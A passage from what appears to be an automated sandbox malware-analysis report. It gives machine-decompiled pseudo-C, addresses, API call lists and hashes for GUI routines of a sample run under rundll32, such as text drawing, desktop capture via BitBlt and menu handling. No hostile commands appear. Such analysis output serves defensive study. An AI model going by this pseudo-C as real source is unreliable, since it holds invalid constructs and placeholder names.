                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E028057AC(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E027F7DC0( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E027D43A8(__ecx);
					_t19 = E027D45A8(__ecx);
					return DrawTextA(E027F84EC(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E027F74D8( *((intOrPtr*)(_t49 + 0xc)), 0xff000014);
				_t31 = E027D43A8(_t60);
				_t33 = E027D45A8(_t60);
				DrawTextA(E027F84EC(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E027F74D8( *((intOrPtr*)(_t49 + 0xc)), 0xff000010);
				_t43 = E027D43A8(_t60);
				_t45 = E027D45A8(_t60);
				return DrawTextA(E027F84EC(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}
















                          0x028057bb
                          0x028057bc
                          0x028057bd
                          0x028057be
                          0x028057bf
                          0x028057c1
                          0x028057c3
                          0x028057cb
                          0x028057d4
                          0x0280585c
                          0x0280585c
                          0x02805866
                          0x0280586e
                          0x00000000
                          0x0280587c
                          0x028057e2
                          0x028057ef
                          0x02805800
                          0x02805808
                          0x02805816
                          0x02805823
                          0x02805830
                          0x0280583f
                          0x02805847
                          0x00000000

                          APIs
                          • OffsetRect.USER32(?,00000001,00000001), ref: 028057E2
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02805816
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 02805823
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02805855
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0280587C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DrawText$OffsetRect
                          • String ID:
                          • API String ID: 1886049697-0
                          • Opcode ID: 3f99b3ec8967ebee851acf4b9195d43cb0b86b88460d0ecb1224d150dc4dbd24
                          • Instruction ID: cdf2616b4a48fcf31b513c6019c530b4bab91a366d23d1dc3941750037fafbcb
                          • Opcode Fuzzy Hash: 3f99b3ec8967ebee851acf4b9195d43cb0b86b88460d0ecb1224d150dc4dbd24
                          • Instruction Fuzzy Hash: E521E472B001282BCB82FB6CDC88DAF73BEAF44321B004515B958FB380DA75E9014FA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02842FF8 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E02842FF8(intOrPtr __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				struct HDC__* _v12;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr _t75;
				void* _t81;
				void* _t83;
				intOrPtr _t84;

				_t81 = _t83;
				_t84 = _t83 + 0xffffffe8;
				_v8 = __eax;
				E02833968(_v8, __ecx, __edx, _a4, _a8);
				_t35 = _v8;
				if( *((char*)(_t35 + 0x57)) != 0) {
					return _t35;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x40))();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x34))();
					_v12 = GetDC(GetDesktopWindow());
					_push(_t81);
					_push(0x28430c4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t84;
					BitBlt(E027F84EC(E027FC894( *((intOrPtr*)(_v8 + 0x230)))), 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c), _v12,  *(_v8 + 0x40),  *(_v8 + 0x44), 0xcc0020);
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(0x28430cb);
					return ReleaseDC(GetDesktopWindow(), _v12);
				}
			}











                          0x02842ff9
                          0x02842ffb
                          0x02843001
                          0x0284300f
                          0x02843014
                          0x0284301b
                          0x0284337a
                          0x02843021
                          0x02843032
                          0x02843046
                          0x02843054
                          0x02843059
                          0x0284305a
                          0x0284305f
                          0x02843062
                          0x028430a2
                          0x028430a9
                          0x028430ac
                          0x028430af
                          0x028430c3
                          0x028430c3

                          APIs
                            • Part of subcall function 02833968: IsIconic.USER32(?), ref: 028339A7
                            • Part of subcall function 02833968: SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 028339C5
                          • GetDesktopWindow.USER32 ref: 02843049
                          • GetDC.USER32(00000000), ref: 0284304F
                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 028430A2
                          • GetDesktopWindow.USER32 ref: 028430B8
                          • ReleaseDC.USER32(00000000,?), ref: 028430BE
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Desktop$IconicRelease
                          • String ID:
                          • API String ID: 1424704201-0
                          • Opcode ID: 475c11d3dcea8d65ae04c6f93e6a986b23160c1992f4a7409b4a5d60b38bcf94
                          • Instruction ID: e7642c356e31e13a6f276c50db3a18c25c451e18591a78d37765831833d20fd5
                          • Opcode Fuzzy Hash: 475c11d3dcea8d65ae04c6f93e6a986b23160c1992f4a7409b4a5d60b38bcf94
                          • Instruction Fuzzy Hash: B221C479A00108EFDB41EB98D994E9EBBF9EF49710F2140A5FA04DB351D735AE00DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282378C Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0282378C(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0282378C(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E028238BC(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E028238BC(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E028238BC(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0282364C(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x28222a0; // 0x28222ec
						if(E027D3398( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E028238BC(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                          0x0282378c
                          0x02823790
                          0x02823796
                          0x028237a0
                          0x028237a2
                          0x00000000
                          0x028237a2
                          0x028237ab
                          0x028237b0
                          0x00000000
                          0x028237b2
                          0x028237c4
                          0x028237c9
                          0x028237cd
                          0x028237d2
                          0x028237db
                          0x028237e5
                          0x028237ec
                          0x028237fc
                          0x02823801
                          0x02823801
                          0x02823803
                          0x02823804
                          0x0282380a
                          0x02823810
                          0x02823845
                          0x02823847
                          0x0282384c
                          0x00000000
                          0x02823852
                          0x02823815
                          0x02823822
                          0x00000000
                          0x02823835
                          0x02823839
                          0x02823840
                          0x00000000
                          0x02823840
                          0x02823822
                          0x0282380a
                          0x02823859

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fca9c1ccf39dd3c2f539c5517633b3cdfef66eb323f029d821c11fe58350950
                          • Instruction ID: 207d71115aad1522f92dfbd83a0c4dd92b3fccce1b3fa5d29934d3789c8b9b4a
                          • Opcode Fuzzy Hash: 7fca9c1ccf39dd3c2f539c5517633b3cdfef66eb323f029d821c11fe58350950
                          • Instruction Fuzzy Hash: FD11876DB01339ABDB61BA3D992875A7AEE5F40744F0440E8BD05DF245DF2CCC8D8A51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02835824 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                          Download Yara Rule
                          C-Code - Quality: 22%
                          			E02835824(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x2864444; // 0x2865890
					_t17 =  *0x2864444; // 0x2865890
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L027FEEB4();
					_v8 = _t19;
					_push(_t49);
					_push(0x28358e4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x2864774; // 0x2865b5c
					E027FEEEC(_v8, E0281C0D4( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x2864774; // 0x2865b5c
					E027FEEEC(_v8, E0281C0D4( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L027FEF44();
					_push( &_v16);
					_push(0);
					L027FEF54();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L027FEF44();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x28358eb);
					_t37 = _v8;
					_push(_t37);
					L027FEEBC();
					return _t37;
				}
			}

















                          0x02835825
                          0x02835827
                          0x0283582b
                          0x02835832
                          0x028358ef
                          0x02835838
                          0x02835840
                          0x0283584c
                          0x02835853
                          0x02835855
                          0x02835856
                          0x0283585b
                          0x02835860
                          0x02835861
                          0x02835866
                          0x02835869
                          0x02835870
                          0x02835881
                          0x0283588a
                          0x0283589b
                          0x028358a0
                          0x028358a2
                          0x028358a4
                          0x028358a9
                          0x028358aa
                          0x028358b2
                          0x028358b3
                          0x028358b5
                          0x028358bd
                          0x028358c1
                          0x028358c2
                          0x028358c7
                          0x028358c8
                          0x028358cf
                          0x028358d2
                          0x028358d5
                          0x028358da
                          0x028358dd
                          0x028358de
                          0x028358e3
                          0x028358e3

                          APIs
                          • 74470BE0.COMCTL32(00000000), ref: 02835856
                            • Part of subcall function 027FEEEC: 74471180.COMCTL32(0282B7C2,000000FF,00000000,02835886,00000000,028358E4,?,00000000), ref: 027FEEF0
                          • 74470860.COMCTL32(0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358AA
                          • 744708D0.COMCTL32(00000000,?,0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358B5
                          • 74470860.COMCTL32(0282B7C2,00000001,?,0283594D,00000000,?,0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358C8
                          • 74471000.COMCTL32(0282B7C2,028358EB,0283594D,00000000,?,0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358DE
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: 74470860$744707447087447100074471180
                          • String ID:
                          • API String ID: 2288716475-0
                          • Opcode ID: 993230848f2c2882b459b843d02a5cb0c17c6e006298673c39df45d04ae58881
                          • Instruction ID: bbcd738b267ccc540c21af9475b7728affdd5e228a31a5340f63b037574d80ed
                          • Opcode Fuzzy Hash: 993230848f2c2882b459b843d02a5cb0c17c6e006298673c39df45d04ae58881
                          • Instruction Fuzzy Hash: FB214F38B84204AFEB51EBA8DC85F6A73FDEB09700F510490FA04DB3A0D675AD00DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281AE64 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E0281AE64(int __eax) {
				int _v8;
				signed char _v10;
				signed int _v12;
				int _t35;

				_v8 = __eax;
				_t35 = _v8;
				if(( *(_t35 + 0x1c) & 0x00000010) == 0 &&  *0x2863c88 != 0) {
					_t35 = E02834254(_v8);
					if(_t35 != 0) {
						_v12 = GetWindowLongA(E02833F7C(_v8), 0xffffffec);
						if( *(_v8 + 0x2e0) != 0 ||  *(_v8 + 0x2e8) != 0) {
							if((_v10 & 0x00000008) == 0) {
								SetWindowLongA(E02833F7C(_v8), 0xffffffec, _v12 | 0x00080000);
							}
							_t35 =  *0x2863c88(E02833F7C(_v8),  *((intOrPtr*)(_v8 + 0x2ec)),  *((intOrPtr*)(_v8 + 0x2e1)),  *(0x2863d0c + ( *(_v8 + 0x2e0) & 0x000000ff) * 4) |  *(0x2863d14 + ( *(_v8 + 0x2e8) & 0x000000ff) * 4));
						} else {
							SetWindowLongA(E02833F7C(_v8), 0xffffffec, _v12 & 0xfff7ffff);
							_t35 = RedrawWindow(E02833F7C(_v8), 0, 0, 0x485);
						}
					}
				}
				return _t35;
			}







                          0x0281ae6a
                          0x0281ae6d
                          0x0281ae74
                          0x0281ae8a
                          0x0281ae91
                          0x0281aea7
                          0x0281aeb4
                          0x0281aec6
                          0x0281aedc
                          0x0281aedc
                          0x0281af21
                          0x0281af29
                          0x0281af3d
                          0x0281af54
                          0x0281af54
                          0x0281aeb4
                          0x0281ae91
                          0x0281af5c

                          APIs
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0281AEA2
                          • SetWindowLongA.USER32(00000000,000000EC,?), ref: 0281AEDC
                          • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000), ref: 0281AF21
                          • SetWindowLongA.USER32(00000000,000000EC,?), ref: 0281AF3D
                          • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,?), ref: 0281AF54
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayeredRedraw
                          • String ID:
                          • API String ID: 1758778077-0
                          • Opcode ID: 32cbb84804e3ef97733ee5bbfb672d8f0f7c58b5df3775e83c028ef67ca7a61b
                          • Instruction ID: d5b9ebd717c06cf6fdffb2a6cfc7b865a751c262828fd76eeda058642ebc297e
                          • Opcode Fuzzy Hash: 32cbb84804e3ef97733ee5bbfb672d8f0f7c58b5df3775e83c028ef67ca7a61b
                          • Instruction Fuzzy Hash: 7B212A78908288AEDB05EBA8D989F9D7BF9AB05314F2405D0F558EB2D1C734EE40DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FCC40 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027FCC40(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E027FB5B4(_t22);
					}
					_t21 = E027F8FD4( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E027F88E4(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                          0x027fcc40
                          0x027fcc44
                          0x027fcc46
                          0x027fcc4d
                          0x027fcc67
                          0x027fcc6d
                          0x027fcc6f
                          0x027fcc6f
                          0x027fcc86
                          0x027fcc8b
                          0x027fcc8d
                          0x027fcc92
                          0x027fcca0
                          0x027fcca6
                          0x027fcccf
                          0x027fcccf
                          0x027fcca8
                          0x027fccab
                          0x027fccc9
                          0x00000000
                          0x027fcccb
                          0x027fcccb
                          0x027fcccb
                          0x027fccc9
                          0x027fccd1
                          0x027fccd6
                          0x027fccde
                          0x027fccde
                          0x027fcce4
                          0x027fcced
                          0x027fccef
                          0x00000000
                          0x027fccef
                          0x027fcced
                          0x027fcc92
                          0x027fccf7

                          APIs
                          • GetDC.USER32(00000000), ref: 027FCC96
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 027FCCAB
                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 027FCCB5
                          • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,027FB78B,00000000,027FB817), ref: 027FCCD9
                          • ReleaseDC.USER32(00000000,00000000), ref: 027FCCE4
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDevice$CreateHalftonePaletteRelease
                          • String ID:
                          • API String ID: 2404249990-0
                          • Opcode ID: 2e4c89e8bbe15d9984da0a8bc9f6e1d9b5e03117ec393588a5974e7e4e460989
                          • Instruction ID: 818561413c26a5a9b7a3ef5aab985bf9e42db723cccf01414919177978a76472
                          • Opcode Fuzzy Hash: 2e4c89e8bbe15d9984da0a8bc9f6e1d9b5e03117ec393588a5974e7e4e460989
                          • Instruction Fuzzy Hash: 2711E93164A29EAEDBA3EF34D4447EE369ABF41714F041116FE105A390D7B49990CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F8F3C Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E027F8F3C(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0x28658c8 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0x27f8fc2);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0x28658c8; // 0x570809f5
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0x28658c8; // 0x570809f5
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0x27f8fc9);
					return ReleaseDC(0, _v12);
				}
			}












                          0x027f8f3d
                          0x027f8f3f
                          0x027f8f43
                          0x027f8f45
                          0x027f8f50
                          0x027f8fd0
                          0x027f8f52
                          0x027f8f59
                          0x027f8f5e
                          0x027f8f5f
                          0x027f8f64
                          0x027f8f67
                          0x027f8f78
                          0x027f8f82
                          0x027f8f88
                          0x027f8f9a
                          0x027f8fa0
                          0x027f8fa5
                          0x027f8fa5
                          0x027f8fab
                          0x027f8fae
                          0x027f8fb1
                          0x027f8fc1
                          0x027f8fc1

                          APIs
                          • GetDC.USER32(00000000), ref: 027F8F54
                          • GetDeviceCaps.GDI32(?,00000068), ref: 027F8F70
                          • GetPaletteEntries.GDI32(570809F5,00000000,00000008,?), ref: 027F8F88
                          • GetPaletteEntries.GDI32(570809F5,00000008,00000008,?), ref: 027F8FA0
                          • ReleaseDC.USER32(00000000,?), ref: 027F8FBC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: EntriesPalette$CapsDeviceRelease
                          • String ID:
                          • API String ID: 3128150645-0
                          • Opcode ID: fffc87661a234298f0f7f1371c3f1b8abbfcecfdfe62ac02b7884e38d12a7121
                          • Instruction ID: a07c46ea83ef60af0190b1fd95035473462851289ef7093df5f3210b458fcadd
                          • Opcode Fuzzy Hash: fffc87661a234298f0f7f1371c3f1b8abbfcecfdfe62ac02b7884e38d12a7121
                          • Instruction Fuzzy Hash: 62112671A8C304BEFB41CBA8AC4AF697BFEE70A700F518491F644DB6C0DA7695448B21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DB690 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E027DB690(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x27db727);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E027DB408(GetThreadLocale(), 0x27db73c, 0x100b,  &_v8);
				_t29 = E027D8620(0x27db73c, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E027DB5DC, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x2865774;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E027DB618, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E027DB72E);
				return E027D40E8( &_v8);
			}










                          0x027db690
                          0x027db693
                          0x027db698
                          0x027db699
                          0x027db69e
                          0x027db6a1
                          0x027db6b7
                          0x027db6c9
                          0x027db6d3
                          0x027db6e3
                          0x027db6e8
                          0x027db6ed
                          0x027db6f2
                          0x027db6f2
                          0x027db6f8
                          0x027db6fb
                          0x027db6fb
                          0x027db70c
                          0x027db70c
                          0x027db713
                          0x027db716
                          0x027db719
                          0x027db726

                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,027DB727,?,?,00000000), ref: 027DB6A8
                            • Part of subcall function 027DB408: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,027DB727,?,?,00000000), ref: 027DB6D8
                          • EnumCalendarInfoA.KERNEL32(Function_0000B5DC,00000000,00000000,00000004), ref: 027DB6E3
                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,027DB727,?,?,00000000), ref: 027DB701
                          • EnumCalendarInfoA.KERNEL32(Function_0000B618,00000000,00000000,00000003), ref: 027DB70C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread$CalendarEnum
                          • String ID:
                          • API String ID: 4102113445-0
                          • Opcode ID: 45caef78b9233d4b54e53c3520f5d31e50c4adee547bf96a48ae0f4a2a823ca0
                          • Instruction ID: 1c120a69fd8993e2b2361f30a8a758fdc9e2470966c377cd09cc53d6f495be74
                          • Opcode Fuzzy Hash: 45caef78b9233d4b54e53c3520f5d31e50c4adee547bf96a48ae0f4a2a823ca0
                          • Instruction Fuzzy Hash: B10149796002046BF703BB74DC16F6A377DDB46B28F921260F111EA6C0DA74AF008E75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02801A00 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02801A00(intOrPtr _a4) {
				intOrPtr _t15;
				struct HMENU__* _t26;

				_t15 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t15 + 0x229)) != 0) {
					_t15 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t15 + 0x228) & 0x00000001) != 0) {
						_t15 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t15 + 0x22f)) != 1) {
							_t26 = GetSystemMenu(E02833F7C( *((intOrPtr*)(_a4 - 4))), 0);
							DeleteMenu(_t26, 0xf130, 0);
							DeleteMenu(_t26, 0xf030, 0);
							DeleteMenu(_t26, 0xf020, 0);
							return DeleteMenu(_t26, 0xf120, 0);
						}
					}
				}
				return _t15;
			}





                          0x02801a07
                          0x02801a11
                          0x02801a16
                          0x02801a20
                          0x02801a25
                          0x02801a2f
                          0x02801a44
                          0x02801a4e
                          0x02801a5b
                          0x02801a68
                          0x00000000
                          0x02801a75
                          0x02801a2f
                          0x02801a20
                          0x02801a7c

                          APIs
                          • GetSystemMenu.USER32(00000000,00000000), ref: 02801A3F
